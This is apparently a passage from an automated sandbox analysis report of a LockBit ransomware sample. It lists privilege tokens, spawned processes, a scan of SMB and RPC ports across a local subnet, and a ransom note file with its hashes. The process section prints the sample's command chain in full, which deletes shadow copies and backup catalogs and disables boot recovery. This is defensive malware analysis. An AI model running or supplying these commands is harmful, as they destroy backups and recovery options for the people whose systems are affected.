Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe

"C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.0:135 tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Program Files\dotnet\Restore-My-Files.txt

MD5 d0aa323040e7474531aa19207ab6de45
SHA1 6dda92e3a4b48f80ad85d37f8e6b551d82f12dbd
SHA256 0f33daf218df6d70a46311fe6cf9e37e6b7d77ee59cd96aced7a1e3ad7d54bfb
SHA512 fde95408a1cc62e021a09d748a6a784b6b40eb2efdf71359186df3f201d990e8861362335d5181541131b998e7df8da028afc0b144688256450cfffe8c518b2c